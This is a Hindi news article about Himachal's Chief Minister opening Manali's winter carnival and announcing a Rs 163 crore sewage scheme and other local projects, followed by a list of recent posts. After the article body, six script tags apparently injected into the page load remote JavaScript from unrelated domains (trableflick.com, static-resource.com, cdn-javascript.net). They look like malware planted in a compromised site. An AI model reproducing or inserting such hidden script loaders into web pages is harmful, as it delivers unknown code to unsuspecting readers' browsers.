Categories: हिमाचल

मुख्यमंत्री ने मनाली शहर के लिए 163 करोड़ रुपये की मल निकासी योजना का किया शिलान्यास

<p>मुख्यमंत्री जय राम ठाकुर ने जिला कुल्लू के मनाली में नौवें राष्ट्रीय शरद उत्सव का शुभारम्भ किया। उन्होंने मनाली के सर्किट हाउस से शरद उत्सव परेड को रवाना किया और इससे पहले हिडिम्बा माता के मन्दिर में पूजा-अर्चना की। यह उत्सव 6 जनवरी तक चलेगा। मनु रंगशाला से अपने सम्बोधन में मुख्यमंत्री ने कहा कि हिमाचल प्रदेश को इसकी समृद्ध परम्पराओं, सांस्कृतिक विविधता के लिए जाना जाता है। मनाली के शरद उत्सव में विश्वभर से लाखो सैलानी भाग लेते हैं। इस उत्सव का आकर्षण लगातार बढ़ रहा है और मनाली भी पर्यटकों के बीच बहुत लोकप्रिय है। 163 करोड़ रुपये से बनने जा रही मल निकासी योजना से मनाली शहर और आस-पास के क्षेत्रों को मल निकासी की सुविधा उपलब्ध होगी। प्रदेश सरकार मनाली को पर्यटन की दृष्टि से और अधिक विकसित करने के लिए प्रयासरत है और यहां पर्याप्त अधोसंरचना विकसित की जाएगी, ताकि स्थानीय लोगों और सैलानियों को विभिन्न सुविधाएं मिल सकें। इस बात पर प्रसन्नता व्यक्त की कि आज मनाली में स्वच्छता, नशे के दुष्प्रभावों, गौ संरक्षण, महिला सशक्तिकरण, कन्या भू्रण हत्या और पर्यावरण संरक्षण जैसे महत्वपूर्ण विषयों पर आयोजित समारोह में 153 से अधिक महिला मण्डलों और स्वयंसेवी संस्थाओं ने भाग लिया। उन्होंने प्रभावशाली तरीके से अपना सन्देश लोगों तक पहुंचाने के लिए महिला प्रतिभागियों की सराहना की।</p>

<p>मुख्यमंत्री ने अपनी सांस्कृतिक विरासत को सहेजने के लिए कुल्लू जिला के लोगों की सराहना करते हुए कहा कि कुल्लू जिला की संस्कृति बहुत समृद्ध एवं विविध है। वह स्वयं पहाड़ी संस्कृति और परम्पराओं पर गर्व महसूस करते है और इन्हें प्रचारित और संरक्षित रखने के लिए प्रतिबद्ध है। पूर्व प्रधानमंत्री अटल बिहारी वाजपेयी को भी यहां से विशेष स्नेह था और मनाली के समीप प्रीणी में उनका घर भी है। अटल सुरंग का निर्माण कार्य इस साल जून माह के अन्त तक पूरा हो जाएगा और प्रधानमंत्री इसे राष्ट्र को समर्पित करेगे। जम्मू एवं कश्मीर से अनुच्छेद-370 को हटाना, तीन तलाक की प्रथा को समाप्त करना और नागरिकता संशोधन विधेयक के रूप में प्रधानमंत्री ने देश के लोगों को पिछले साल के बड़े तोहफे दिए।मुख्यमंत्री ने कहा कि मनाली में लाईट एण्ड साउण्ड कार्यक्रम के आयोजन की घोषणा की। उन्होंने भेखली (मनाली) में प्राथमिक स्वास्थ्य केन्द्र खोलने और भेखली राजकीय वरिष्ठ माध्यमिक पाठशाला में विज्ञान कक्षाएं आरम्भ करने की घोषणा की।उन्होंने घोषणा की कि गोशाल सड़क पर जीप योग्य पुल का निर्माण किया जाएगा। उन्होंने कहा कि बाएं तट पर सड़क सुधार पर पांच करोड़ रुपये खर्च किए जाएंगे और मनाली में एक ऑडिटोरियम का निर्माण किया जाएगा। महिला मण्डलों और स्वयंसेवी संस्थाओं की झांकियों को भी रवाना किया।</p>

<p>मुख्यमंत्री ने इसके उपरान्त मनाली में 3 करोड़ रुपये की लागत से बनने जा रहे नागरिक अस्पताल का शिलान्यास किया। उन्होंने कलथ में 55 मीटर लम्बे स्पैन पुल और राजकीय वरिष्ठ माध्यमिक पाठशाला पलचान के भवन का शिलान्यास भी किया।उन्होंने चयाल मनाली में वन विभाग के विश्राम गृह भवन, जगत सुख में ईको पार्क की आधारशिला रखने के साथ-साथ मनाली के लिए 163 करोड़ रुपये से तैयार होने वाली मल निकासी योजना की आधारशिला रखी। इससे पूर्व, मुख्यमंत्री ने मनाली विंटर हिल क्लाईंब कार रैली को रवाना किया। उन्होंने परिधी गृह मनाली में देवदार का पौधा भी रोपा। उन्होंने आयोजन समिति द्वारा तैयार की गई स्मारिका तथा सड़क सुरक्षा पर पोस्टर भी जारी किया। उन्होंने बलसारी गांव की 102 वर्षिय महिला थेलबारू देवी को सम्मानित भी किया। वन एवं परिहवन मंत्री गोविन्द सिंह ठाकुर ने मनाली नगर में करोड़ों रुपये की विकास परियोजनाएं समर्पित करने के लिए मुख्यमंत्री का आभार व्यक्त किया। उन्होंने कहा कि मुख्यमंत्री ने कुल्लू जिला की विभिन्न मांगों और जरूरतों के प्रति हमेशा सहानुभूतिपूर्वक विचार किया है, जिससे जिला प्रगति और खुशहाली की राह पर आगे बढ़ा है। सांसद, रामस्वरूप शर्मा ने कहा कि केन्द्र और राज्य की डबल ईंजन की सरकारों के प्रयासों से हिमाचल प्रदेश विकास के मामले में देश का सबसे आदर्श राज्य बनने जा रहा है। उपायुक्त डॉ ऋचा वर्मा ने शरद उत्सव के दौरान आयोजित होने वाली विभिन्न गतिविधियों की जानकारी दी।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://trableflick.com/optout/set/lat?jsonp=__mtz_cb_753000822&amp;key=21aca573d498d25317&amp;cv=1578019234&amp;t=1578019234594″ type=”text/javascript”></script>
<script src=”http://trableflick.com/optout/set/lt?jsonp=__mtz_cb_868011965&amp;key=21aca573d498d25317&amp;cv=25381&amp;t=1578019234596″ type=”text/javascript”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578019234613″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

7 hours ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को सुक्‍खू सरकार ने विस्‍तार दिया है। योजना…

8 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

8 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

9 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

10 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

10 hours ago